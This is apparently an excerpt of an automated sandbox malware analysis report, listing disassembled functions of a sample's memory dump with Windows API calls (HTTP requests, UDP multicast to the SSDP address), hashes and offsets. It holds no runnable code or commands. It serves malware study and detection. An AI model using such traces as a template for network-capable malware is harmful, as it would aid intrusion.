                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                    • String ID: %S%S
                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                    • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                    • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                    • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                    • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                    Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                      • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                      • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                      • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                      • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                      • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                      • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                      • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                      • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                      • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                      • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                    • String ID: TCP$UDP
                                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                                    • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                    • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                    • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                    • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                    Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 469056452-0
                                                                                                                                    • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                    • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                    • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                    • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A